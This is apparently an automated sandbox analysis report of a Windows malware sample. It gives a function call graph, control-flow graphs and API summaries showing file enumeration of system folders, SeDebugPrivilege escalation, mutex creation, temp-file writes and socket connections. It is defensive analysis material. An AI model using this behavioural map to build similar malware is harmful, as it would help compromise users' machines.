403f7b 8958->8960 8959 403d74 15 API calls 8959->8962 8963 403bef 5 API calls 8960->8963 8961->8948 8961->8950 8961->8955 8964 402bab 2 API calls 8961->8964 8974 40fa23 8961->8974 8962->8944 8962->8953 8962->8959 8965 402bab 2 API calls 8962->8965 8966 403f63 8962->8966 8963->8945 8964->8961 8965->8962 8967 402bab 2 API calls 8966->8967 8968 403f69 8967->8968 8969 403bef 5 API calls 8968->8969 8969->8945 8972 4031e5 4 API calls 8971->8972 8973 403c01 FindClose 8972->8973 8973->8952 8975 40fa39 8974->8975 8976 410293 8975->8976 8977 405b6f 6 API calls 8975->8977 8976->8961 8978 40ffcc 8977->8978 8978->8976 8979 4040bb 12 API calls 8978->8979 8980 40ffeb 8979->8980 8981 41028c 8980->8981 8984 402b7c 2 API calls 8980->8984 9029 41027d 8980->9029 8982 402bab 2 API calls 8981->8982 8982->8976 8983 403f9e 5 API calls 8983->8981 8985 41001e 8984->8985 8986 40a423 4 API calls 8985->8986 8985->9029 8987 41004a 8986->8987 8988 4031e5 4 API calls 8987->8988 8989 41005c 8988->8989 8990 4031e5 4 API calls 8989->8990 8991 410079 8990->8991 8992 4031e5 4 API calls 8991->8992 8993 410096 8992->8993 8994 4031e5 4 API calls 8993->8994 8995 4100b0 8994->8995 8996 4031e5 4 API calls 8995->8996 8997 4100cd 8996->8997 8998 4031e5 4 API calls 8997->8998 8999 4100ea 8998->8999 9030 412516 8999->9030 9001 4100fd 9002 40642c 5 API calls 9001->9002 9003 41013e 9002->9003 9004 410142 9003->9004 9005 41019f 9003->9005 9006 40488c 5 API calls 9004->9006 9008 4031e5 4 API calls 9005->9008 9007 410151 9006->9007 9010 41019c 9007->9010 9011 404866 4 API calls 9007->9011 9022 4101bb 9008->9022 9009 41022a 9019 413a58 13 API calls 9009->9019 9010->9009 9012 40642c 5 API calls 9010->9012 9013 410163 9011->9013 9014 410201 9012->9014 9018 406c4c 6 API calls 9013->9018 9026 41018e 9013->9026 9016 410205 9014->9016 9017 41022f 9014->9017 9015 403c40 5 API calls 9015->9010 9020 4126a7 7 API calls 9016->9020 9033 4125db 9017->9033 9023 410178 9018->9023 9027 41026e 9019->9027 9020->9009 9024 4031e5 4 API calls 9022->9024 9025 406c4c 6 API calls 9023->9025 9024->9010 9025->9026 9026->9015 9028 402bab 2 API calls 9027->9028 9028->9029 9029->8983 9031 4031e5 4 API calls 9030->9031 9032 412539 9031->9032 9032->9001 9034 40488c 5 API calls 9033->9034 9035 4125ec 9034->9035 9036 41269f 9035->9036 9037 4031e5 4 API calls 9035->9037 9036->9009 9038 412609 9037->9038 9040 4031e5 4 API calls 9038->9040 9045 41268f 9038->9045 9039 403c40 5 API calls 9039->9036 9041 41262a 9040->9041 9049 412675 9041->9049 9050 4124f1 9041->9050 9043 4031e5 4 API calls 9043->9045 9045->9039 9046 412663 9048 4031e5 4 API calls 9046->9048 9047 4124f1 4 API calls 9047->9046 9048->9049 9049->9043 9051 4031e5 4 API calls 9050->9051 9052 412503 9051->9052 9052->9046 9052->9047 9239 4049dc 9240 4031e5 4 API calls 9239->9240 9241 4049ef 9240->9241 9896 40cddd 9897 405b6f 6 API calls 9896->9897 9898 40cdee 9897->9898 9899 40ce06 9898->9899 9900 413a58 13 API calls 9898->9900 9901 405b6f 6 API calls 9899->9901 9907 40ce59 9899->9907 9902 40ce00 9900->9902 9904 40ce1c 9901->9904 9903 402bab 2 API calls 9902->9903 9903->9899 9906 403d74 19 API calls 9904->9906 9904->9907 9910 40ce52 9904->9910 9905 402bab 2 API calls 9905->9907 9908 40ce45 9906->9908 9909 402bab 2 API calls 9908->9909 9908->9910 9909->9910 9910->9905 9242 40ecde 9243 412093 20 API calls 9242->9243 9244 40ecfd 9243->9244 9245 412093 20 API calls 9244->9245 9246 40ed0d 9245->9246 9250 40e8df 9251 412093 20 API calls 9250->9251 9252 40e8f8 9251->9252 9253 412093 20 API calls 9252->9253 9254 40e908 9253->9254 9261 404b22 9254->9261 9256 40e91c 9257 40e936 9256->9257 9260 40e93d 9256->9260 9268 40e944 9256->9268 9259 402bab 2 API calls 9257->9259 9259->9260 9262 402b7c 2 API calls 9261->9262 9263 404b33 9262->9263 9267 404b66 9263->9267 9277 4049b3 9263->9277 9266 402bab 2 API calls 9266->9267 9267->9256 9269 4056bf 2 API calls 9268->9269 9270 40e952 9269->9270 9271 4057df 13 API calls 9270->9271 9276 40e976 9270->9276 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9276 9276->9257 9278 4031e5 4 API calls 9277->9278 9279 4049c6 9278->9279 9279->9266 9279->9267 9280 4139de 9289 413855 9280->9289 9282 4139f1 9283 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9282->9283 9288 4139f7 9283->9288 9284 413866 58 API calls 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9288->9284 9290 4031e5 4 API calls 9289->9290 9291 413864 9290->9291 9291->9291 9916 4116e7 9917 4117ba 9916->9917 9918 4117f1 9917->9918 9919 405b6f 6 API calls 9917->9919 9920 4117d0 9919->9920 9920->9918 9921 404cbf 8 API calls 9920->9921 9922 4117eb 9921->9922 9923 402bab 2 API calls 9922->9923 9923->9918 9311 4094e7 9312 404b22 6 API calls 9311->9312 9313 4094fe 9312->9313 9314 409554 9313->9314 9315 405b6f 6 API calls 9313->9315 9316 409514 9315->9316 9317 404b22 6 API calls 9316->9317 9323 40954d 9316->9323 9319 40952d 9317->9319 9318 402bab 2 API calls 9318->9314 9320 409408 15 API calls 9319->9320 9325 409544 9319->9325 9322 40953e 9320->9322 9321 402bab 2 API calls 9321->9323 9324 402bab 2 API calls 9322->9324 9323->9318 9324->9325 9325->9321 9334 4058ea 9335 4031e5 4 API calls 9334->9335 9336 4058fd StrStrA 9335->9336 9968 40d4ea 9969 404bee 6 API calls 9968->9969 9970 40d500 9969->9970 9971 40d5a0 9970->9971 9972 404bee 6 API calls 9970->9972 9973 40d529 9972->9973 9974 404bee 6 API calls 9973->9974 9975 40d537 9974->9975 9976 404bee 6 API calls 9975->9976 9977 40d546 9976->9977 9977->9971 9978 405872 4 API calls 9977->9978 9979 40d56d 9978->9979 9980 405872 4 API calls 9979->9980 9981 40d57c 9980->9981 9982 405872 4 API calls 9981->9982 9983 40d58e 9982->9983 9984 405872 4 API calls 9983->9984 9984->9971 9985 40a3ea 9986 40374e 6 API calls 9985->9986 9987 40a403 9986->9987 9988 40a419 9987->9988 9989 4059d8 4 API calls 9987->9989 9990 40a411 9989->9990 9991 402bab 2 API calls 9990->9991 9991->9988 9374 404df3 WSAStartup 9378 4091f6 9379 404b22 6 API calls 9378->9379 9380 40920b 9379->9380 9381 409222 9380->9381 9382 409408 15 API calls 9380->9382 9383 40921c 9382->9383 9384 402bab 2 API calls 9383->9384 9384->9381 10018 4117fe 10019 404c4e 6 API calls 10018->10019 10020 411888 10019->10020 10021 404c4e 6 API calls 10020->10021 10023 411925 10020->10023 10022 4118ab 10021->10022 10022->10023 10037 4119b3 10022->10037 10025 4118c5 10026 4119b3 4 API calls 10025->10026 10027 4118d0 10026->10027 10027->10023 10028 4056bf 2 API calls 10027->10028 10029 4118fd 10028->10029 10030 405872 4 API calls 10029->10030 10031 41190a 10030->10031 10032 405872 4 API calls 10031->10032 10033 411915 10032->10033 10034 413aca 4 API calls 10033->10034 10035 41191f 10034->10035 10036 405695 2 API calls 10035->10036 10036->10023 10038 4119c6 10037->10038 10039 4119bf 10037->10039 10040 4031e5 4 API calls 10038->10040 10039->10025 10040->10039 9388 40e880 9389 41219c 14 API calls 9388->9389 9390 40e88e 9389->9390 9391 41219c 14 API calls 9390->9391 9392 40e89c 9391->9392 10104 40e48a 10105 404bee 6 API calls 10104->10105 10106 40e4d0 10105->10106 10107 40e4f4 10106->10107 10108 405872 4 API calls 10106->10108 10108->10107 9489 410390 9490 404b22 6 API calls 9489->9490 9491 4103a5 9490->9491 9492 410409 9491->9492 9493 405b6f 6 API calls 9491->9493 9496 4103ba 9493->9496 9494 410402 9495 402bab 2 API calls 9494->9495 9495->9492 9496->9494 9498 403d74 19 API calls 9496->9498 9501 4103fb 9496->9501 9497 402bab 2 API calls 9497->9494 9499 4103ee 9498->9499 9500 402bab 2 API calls 9499->9500 9499->9501 9500->9501 9501->9497 10119 40ed96 10120 4040bb 12 API calls 10119->10120 10134 40edb0 10120->10134 10121 40ef90 10122 40ef87 10123 403f9e 5 API calls 10122->10123 10123->10121 10124 405ae9 6 API calls 10124->10134 10125 412269 6 API calls 10125->10134 10126 40ef61 10129 40ef6e 10126->10129 10130 402bab 2 API calls 10126->10130 10127 402bab GetProcessHeap HeapFree 10127->10134 10128 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10128->10134 10131 40ef7c 10129->10131 10132 402bab 2 API calls 10129->10132 10130->10129 10131->10122 10133 402bab 2 API calls 10131->10133 10132->10131 10133->10122 10134->10121 10134->10122 10134->10124 10134->10125 10134->10126 10134->10127 10134->10128 10135 40ef98 10136 404c4e 6 API calls 10135->10136 10137 40efb6 10136->10137 10138 40f02a 10137->10138 10150 40f054 10137->10150 10141 404bee 6 API calls 10142 40efda 10141->10142 10143 404bee 6 API calls 10142->10143 10144 40efe9 10143->10144 10144->10138 10145 405872 4 API calls 10144->10145 10146 40f008 10145->10146 10147 405872 4 API calls 10146->10147 10148 40f01a 10147->10148 10149 405872 4 API calls 10148->10149 10149->10138 10151 40f064 10150->10151 10152 402b7c 2 API calls 10151->10152 10154 40f072 10152->10154 10153 40efca 10153->10141 10154->10153 10156 405ecd 10154->10156 10157 4059b8 4 API calls 10156->10157 10158 405edf 10157->10158 10158->10154 9508 410c98 9509 41219c 14 API calls 9508->9509 9510 410ca8 9509->9510 9511 41219c 14 API calls 9510->9511 9512 410cb5 9511->9512 9513 412093 20 API calls 9512->9513 9514 410cc9 9513->9514 10228 41249c 10229 4056bf 2 API calls 10228->10229 10230 4124aa 10229->10230 10231 4057df 13 API calls 10230->10231 10236 4124ce 10230->10236 10232 4124be 10231->10232 10233 413aca 4 API calls 10232->10233 10234 4124c8 10233->10234 10235 405695 2 API calls 10234->10235 10235->10236 9518 40f49e 9519 40f4b6 13 API calls 9518->9519 9520 40f4a8 9519->9520 9521 40929e 9522 413b28 6 API calls 9521->9522 9523 4092a4 9522->9523 9524 405b6f 6 API calls 9523->9524 9525 4092af 9524->9525 9526 4092c5 9525->9526 9527 409408 15 API calls 9525->9527 9528 4092bf 9527->9528 9529 402bab 2 API calls 9528->9529 9529->9526 10255 407fa4 10256 407fb7 10255->10256 10257 402b7c 2 API calls 10256->10257 10259 407fee 10256->10259 10258 40800d 10257->10258 10258->10259 10260 4037be 4 API calls 10258->10260 10261 40803c 10260->10261 10262 402bab 2 API calls 10261->10262 10262->10259 9566 4090aa 9567 404b22 6 API calls 9566->9567 9568 4090c1 9567->9568 9569 4090d8 9568->9569 9570 409408 15 API calls 9568->9570 9571 404b22 6 API calls 9569->9571 9572 4090d2 9570->9572 9573 4090eb 9571->9573 9574 402bab 2 API calls 9572->9574 9575 408c4d 15 API calls 9573->9575 9578 409104 9573->9578 9574->9569 9576 4090fe 9575->9576 9577 402bab 2 API calls 9576->9577 9577->9578 9585 409cae 9600 404b79 9585->9600 9587 409cc5 9588 409d27 9587->9588 9590 405b6f 6 API calls 9587->9590 9591 409d2f 9587->9591 9589 402bab 2 API calls 9588->9589 9589->9591 9592 409cec 9590->9592 9592->9588 9593 404b79 6 API calls 9592->9593 9594 409d05 9593->9594 9595 409d1e 9594->9595 9596 408c4d 15 API calls 9594->9596 9597 402bab 2 API calls 9595->9597 9598 409d18 9596->9598 9597->9588 9599 402bab 2 API calls 9598->9599 9599->9595 9601 404b22 6 API calls 9600->9601 9602 404b8a 9601->9602 9602->9587 10322 411fb3 10323 405b6f 6 API calls 10322->10323 10325 412013 10323->10325 10324 412075 10325->10324 10340 41206a 10325->10340 10341 411a8d 10325->10341 10327 402bab 2 API calls 10327->10324 10329 4056bf 2 API calls 10330 41203d 10329->10330 10331 405872 4 API calls 10330->10331 10332 41204a 10331->10332 10333 413aca 4 API calls 10332->10333 10334 412054 10333->10334 10335 405695 2 API calls 10334->10335 10336 41205a 10335->10336 10337 413a58 13 API calls 10336->10337 10338 412064 10337->10338 10339 402bab 2 API calls 10338->10339 10339->10340 10340->10327 10342 402b7c 2 API calls 10341->10342 10343 411aa3 10342->10343 10351 411f05 10343->10351 10364 404ada 10343->10364 10346 404ada 4 API calls 10347 411cad 10346->10347 10348 411f0c 10347->10348 10349 411cc0 10347->10349 10350 402bab 2 API calls 10348->10350 10367 405eb6 10349->10367 10350->10351 10351->10329 10351->10340 10353 411d3c 10354 4031e5 4 API calls 10353->10354 10362 411d7b 10354->10362 10355 411ea6 10356 4031e5 4 API calls 10355->10356 10357 411eb5 10356->10357 10358 4031e5 4 API calls 10357->10358 10359 411ed6 10358->10359 10360 405eb6 4 API calls 10359->10360 10360->10351 10361 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10361->10362 10362->10355 10362->10361 10363 405eb6 4 API calls 10362->10363 10363->10362 10365 4031e5 4 API calls 10364->10365 10366 404afd 10365->10366 10366->10346 10368 405998 4 API calls 10367->10368 10369 405ec8 10368->10369 10369->10353 9632 40f6b8 9633 41219c 14 API calls 9632->9633 9634 40f6c7 9633->9634 9635 41219c 14 API calls 9634->9635 9636 40f6d5 9635->9636 9637 41219c 14 API calls 9636->9637 9638 40f6df 9637->9638 9657 40d6bd 9658 4056bf 2 API calls 9657->9658 9659 40d6c9 9658->9659 9670 404cbf 9659->9670 9662 404cbf 8 API calls 9663 40d6f4 9662->9663 9664 404cbf 8 API calls 9663->9664 9665 40d702 9664->9665 9666 413aca 4 API calls 9665->9666 9667 40d711 9666->9667 9668 405695 2 API calls 9667->9668 9669 40d71f 9668->9669 9671 402b7c 2 API calls 9670->9671 9672 404ccd 9671->9672 9673 404ddc 9672->9673 9674 404b8f 5 API calls 9672->9674 9673->9662 9675 404ce4 9674->9675 9676 404dd4 9675->9676 9678 402b7c 2 API calls 9675->9678 9677 402bab 2 API calls 9676->9677 9677->9673 9679 404d04 9678->9679 9680 404dcc 9679->9680 9682 404dc6 9679->9682 9683 402b7c 2 API calls 9679->9683 9685 404b8f 5 API calls 9679->9685 9686 402bab GetProcessHeap HeapFree 9679->9686 9687 404a39 5 API calls 9679->9687 9688 405b6f 6 API calls 9679->9688 9689 404cbf 8 API calls 9679->9689 9681 404a39 5 API calls 9680->9681 9681->9676 9684 402bab 2 API calls 9682->9684 9683->9679 9684->9680 9685->9679 9686->9679 9687->9679 9688->9679 9689->9679 9690 40f0bf 9691 4056bf 2 API calls 9690->9691 9692 40f0c9 9691->9692 9693 40f115 9692->9693 9695 404cbf 8 API calls 9692->9695 9694 41219c 14 API calls 9693->9694 9696 40f128 9694->9696 9697 40f0ed 9695->9697 9698 404cbf 8 API calls 9697->9698 9699 40f0fb 9698->9699 9700 413aca 4 API calls 9699->9700 9701 40f10a 9700->9701 9702 405695 2 API calls 9701->9702 9702->9693

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 154 403f97-403f9d 152->154 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 189 403e30-403e4c call 405b6f 172->189 190 403e24-403e2e 172->190 173->166 186 403dfb-403e10 call 405eff 173->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->172 189->166 203 403e4e-403e6f call 403d74 call 402bab 189->203 190->166 190->189 193->162 205 403f8d 196->205 197->159 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 205->160 209->181 217->154
                                              APIs
                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$FirstNext
                                              • String ID: %s\%s$%s\*$Program Files$Windows
                                              • API String ID: 1690352074-2009209621
                                              • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                              • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                              • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                              • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 3615134276-2896544425
                                              • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                              • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                              • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                              • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateProcess
                                              • String ID:
                                              • API String ID: 1357844191-0
                                              • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                              • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                              • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                              • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: recv
                                              • String ID:
                                              • API String ID: 1507349165-0
                                              • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                              • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                              • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                              • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 231->235 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 259 406311-406317 call 402bab 257->259 260 406318-40631e 257->260 259->260 265 406320-406326 call 402bab 260->265 266 406327 260->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062e4 call 4031e5 262->273 263->257 265->266 266->235 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                              • _wmemset.LIBCMT ref: 00406244
                                              • _wmemset.LIBCMT ref: 00406261
                                              • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _wmemset$ErrorInformationLastToken
                                              • String ID: IDA$IDA
                                              • API String ID: 487585393-2020647798
                                              • Opcode ID: d0395f9089772e9078c0cbeb7e7a69d574c5e4bdcef80e12950fd19a5f1576fd
                                              • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                              • Opcode Fuzzy Hash: d0395f9089772e9078c0cbeb7e7a69d574c5e4bdcef80e12950fd19a5f1576fd
                                              • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 553 404ec7-404ec9 542->553 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 547 404ec0-404ec6 call 402bab 545->547 548 404ecb 545->548 546->545 547->553 552 404ecd-404ece 548->552 552->539 553->552
                                              APIs
                                              • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                              • socket.WS2_32(?,?,?), ref: 00404E7A
                                              • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: freeaddrinfogetaddrinfosocket
                                              • String ID:
                                              • API String ID: 2479546573-0
                                              • Opcode ID: d0cbd2bfe5b0935c94ba089aae0b4a72727b205c69b8882af43eb62a71f59e55
                                              • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                              • Opcode Fuzzy Hash: d0cbd2bfe5b0935c94ba089aae0b4a72727b205c69b8882af43eb62a71f59e55
                                              • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$AllocCreateReadVirtual
                                              • String ID: .tmp
                                              • API String ID: 3585551309-2986845003
                                              • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                              • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                              • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                              • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                              • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                              • GetLastError.KERNEL32 ref: 0041399E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_SCB#89940578.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Error$CreateLastModeMutex
                                              • String ID:
                                              • API String ID: 3448925889-0
                                              • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                              • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                              • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                              • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
